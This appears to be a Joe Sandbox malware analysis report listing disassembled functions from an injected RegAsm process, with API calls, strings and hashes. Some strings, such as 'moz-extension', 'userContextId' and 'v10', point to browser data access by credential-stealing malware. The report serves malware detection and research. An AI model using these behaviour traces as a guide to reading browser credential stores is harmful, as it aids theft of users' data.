                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                              • API String ID: 2813378046-3310892237
                                              • Opcode ID: 0fa5739aac8e61d1af54969c4d9e70286597886c95e1368eaa3db2e29bc7792c
                                              • Instruction ID: aa378f3f393c6f0bf4ef5264fdf5fbf40a59fe2ac5a126e2390ab41a3762eaae
                                              • Opcode Fuzzy Hash: 0fa5739aac8e61d1af54969c4d9e70286597886c95e1368eaa3db2e29bc7792c
                                              • Instruction Fuzzy Hash: 6B71C331805248EECF04EBE4D946BDDBBB4AF15308F40415EF855632C2DBB82788CAA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
                                              • API String ID: 0-361449301
                                              • Opcode ID: c8738df7914373ac6baec6c617ca9d3f97b47c5e53eb539f423327bf2ba43e7c
                                              • Instruction ID: 737c838ad221ea7003cea3a9379ef75b558d1a21835126daeaac5c78ff595214
                                              • Opcode Fuzzy Hash: c8738df7914373ac6baec6c617ca9d3f97b47c5e53eb539f423327bf2ba43e7c
                                              • Instruction Fuzzy Hash: CB61DFF19103428FDB148F24E9857DA77E4FF50705F01092AE996CB281E776E94CCBA1
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,1B8C94C2,00000104), ref: 1B87EFDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: FileModuleName
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 514040917-4022980321
                                              • Opcode ID: dd6cf44fe3ed62d24e8d7507ea27045c83a4baf8a77ee9fd7107dc41d085bf50
                                              • Instruction ID: fda97db3c837452356c66eaecc5907688302969db2e4322fb013b55c2ff20381
                                              • Opcode Fuzzy Hash: dd6cf44fe3ed62d24e8d7507ea27045c83a4baf8a77ee9fd7107dc41d085bf50
                                              • Instruction Fuzzy Hash: C92122B6A4039776DB3172228C85EEB36DC9BA5E99B040465FC08E7380F721D619C1A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                              • API String ID: 0-593389478
                                              • Opcode ID: 2802906554ef52c9e1e8aabab8022f28f92a2761160d84c82084667ac2d49613
                                              • Instruction ID: e5226aa699c1671b37b0b2f0ee3e6d918c8c10877b68316e1a0add7bfc11a780
                                              • Opcode Fuzzy Hash: 2802906554ef52c9e1e8aabab8022f28f92a2761160d84c82084667ac2d49613
                                              • Instruction Fuzzy Hash: F941D175A00202AFDB548E34DD80BEFB3A4EF85225F1C4B6EF85597211E772E885CB91
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6CF4B0
                                              • unable to delete/modify collation sequence due to active statements, xrefs: 1B6CF533
                                              • %s at line %d of [%.10s], xrefs: 1B6CF4BF
                                              • misuse, xrefs: 1B6CF4BA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                              • API String ID: 0-3348720253
                                              • Opcode ID: 599d4f6fd3d0de46d1d826e87e65f09ba258b5d209036250276c1e86d4d67d7c
                                              • Instruction ID: 0a709ca50be6ef6aa7afd139c419765f75ac9d5295f3bfbee1273757a6480d1a
                                              • Opcode Fuzzy Hash: 599d4f6fd3d0de46d1d826e87e65f09ba258b5d209036250276c1e86d4d67d7c
                                              • Instruction Fuzzy Hash: 69412BB26043405BD700AF24EC80BEBB7E4EFA5325F14456EF6999B282D332E519C761
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00406EF6
                                              • memcmp.MSVCRT ref: 00406F1C
                                              • memset.MSVCRT ref: 00406F4B
                                              • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                              • String ID: v10
                                              • API String ID: 2733184300-1337588462
                                              • Opcode ID: 274425dc9dd2d5408ca2c1823e04d1afc33a5c5e84488e75787c78096f616c2b
                                              • Instruction ID: bc6bff1ab3669fb83834f3c9b010693020decb808c53772bcd62d52679a177a4
                                              • Opcode Fuzzy Hash: 274425dc9dd2d5408ca2c1823e04d1afc33a5c5e84488e75787c78096f616c2b
                                              • Instruction Fuzzy Hash: D8319DB1E00219ABCB10DF95DC95EEEBB78EF01358F10412FF822A6181D778AA55CB59
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B75EC42
                                              • CREATE , xrefs: 1B75EBFF
                                              • %s at line %d of [%.10s], xrefs: 1B75EC51
                                              • database corruption, xrefs: 1B75EC4C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-1360532505
                                              • Opcode ID: bef99ae180e952773f283407dddcf002d63362c301da28b65c20c4bb6ed6cbb4
                                              • Instruction ID: 1b3086002b70dcfa8c08a4c2c529fe6f7f7bcc67d006b0dbe0e86a6deba3cd21
                                              • Opcode Fuzzy Hash: bef99ae180e952773f283407dddcf002d63362c301da28b65c20c4bb6ed6cbb4
                                              • Instruction Fuzzy Hash: 11313A629083C25ADF110A69AC40BFA7B95AB8562AF1445BFF8C54E283E726D181D731
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                              • API String ID: 0-453588374
                                              • Opcode ID: fe1c6c797c0f6f9eb983dc745aae3afa94e786702bb06b555961bdb87c8b33bc
                                              • Instruction ID: 0cf5a9b85d6956d7db5a122363f68ae52b33e3c5fc4b0d1c6855a31161fd090a
                                              • Opcode Fuzzy Hash: fe1c6c797c0f6f9eb983dc745aae3afa94e786702bb06b555961bdb87c8b33bc
                                              • Instruction Fuzzy Hash: 213127F1F4434157DF244B24EE0ABFB33765BA0B05F2D441AE4959B242D62DE88B83A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: a17c0fafd9b407451b095737ef5a4895431ec2a129838729d8e99b2620362c4b
                                              • Instruction ID: c91d4d9801f6938cff12c7b6af10a8f58eaaaf9d2251b19660e8ce91ae14d9af
                                              • Opcode Fuzzy Hash: a17c0fafd9b407451b095737ef5a4895431ec2a129838729d8e99b2620362c4b
                                              • Instruction Fuzzy Hash: FD316975A04B904BC314DF28C890AF7BBF6AF89706B50849CE6C74B756E332E842C760
                                              Strings
                                              • unknown database: %s, xrefs: 1B691CBD
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B691D3C
                                              • %s at line %d of [%.10s], xrefs: 1B691D4B
                                              • misuse, xrefs: 1B691D46
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                              • API String ID: 0-142545749
                                              • Opcode ID: 8bae666eb66eb5e74e06d7d47350957bcc17e5d9a9587067d597370920025e32
                                              • Instruction ID: f48570064c216a478ce388609a5296c8852772a73105eebca4681cc9c2761671
                                              • Opcode Fuzzy Hash: 8bae666eb66eb5e74e06d7d47350957bcc17e5d9a9587067d597370920025e32
                                              • Instruction Fuzzy Hash: 922105F5500741FFD7109E27BC44FDB76A9AFE2B19F20052DF8A956281D734A505C272
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 3da5f2c55a398cc2b22d1c615e07af4a9d9a3bd4cda431556f48f7f9b6026a72
                                              • Instruction ID: 979a694d186a22abe205b278b9b64b58eed3e6030942fdb2c34ab200b88864a8
                                              • Opcode Fuzzy Hash: 3da5f2c55a398cc2b22d1c615e07af4a9d9a3bd4cda431556f48f7f9b6026a72
                                              • Instruction Fuzzy Hash: 3121C1B7A452115BCB00DF18DC41AEB7BD4FBA8A51F42402AFD8497301E325D699C7E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 0a2d43994cc6dd973660a88bf8a9047e6e5534db67c50cfac5ef29f2794bc189
                                              • Instruction ID: ba294a82fe57be0f3a44185efd02f43692b4468cb24fb3431dcd0e26e67cb650
                                              • Opcode Fuzzy Hash: 0a2d43994cc6dd973660a88bf8a9047e6e5534db67c50cfac5ef29f2794bc189
                                              • Instruction Fuzzy Hash: 1A217925508B905AC3219F389C81AE7BFF5AF55701B45449CF1D387396E332E481C760
                                              APIs
                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040EB4E
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
                                                • Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
                                                • Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB
                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040EB70
                                              • memcpy.MSVCRT ref: 0040EBAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                              • String ID: invalid string position$string too long
                                              • API String ID: 214693668-4289949731
                                              • Opcode ID: 046f17c3491fb6de0b61b79e339c676c81cd2b3016ea19a927114e91ef761e82
                                              • Instruction ID: e0fe832959dc5e7c627ff2559cbebd202760873d3578ed02ff6bc1c96de2b888
                                              • Opcode Fuzzy Hash: 046f17c3491fb6de0b61b79e339c676c81cd2b3016ea19a927114e91ef761e82
                                              • Instruction Fuzzy Hash: 10117C323102009BDB24DE1AD981A5AB3F8EF05714B100D3AF953AB2C1D7B8F9548799
                                              Strings
                                              • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1B6A33D6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                              • API String ID: 0-1935849370
                                              • Opcode ID: 652bc59e1cdc85b0ef7ec4df58b5d69040235427327700e4e43947cd2f49d191
                                              • Instruction ID: e4cc4278fde2373855c4e4805d3a01c2a2c04ae86cbecc37440a3690961e94e6
                                              • Opcode Fuzzy Hash: 652bc59e1cdc85b0ef7ec4df58b5d69040235427327700e4e43947cd2f49d191
                                              • Instruction Fuzzy Hash: 4B01F5797013164BDB01DF2DE841BCAB3D9EFD5311F058176F6008B240EBB4A8878BA1
                                              Strings
                                              • Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 1B763E6C
                                              • SELECT count(*) FROM %Q.'%q%s', xrefs: 1B763E26
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
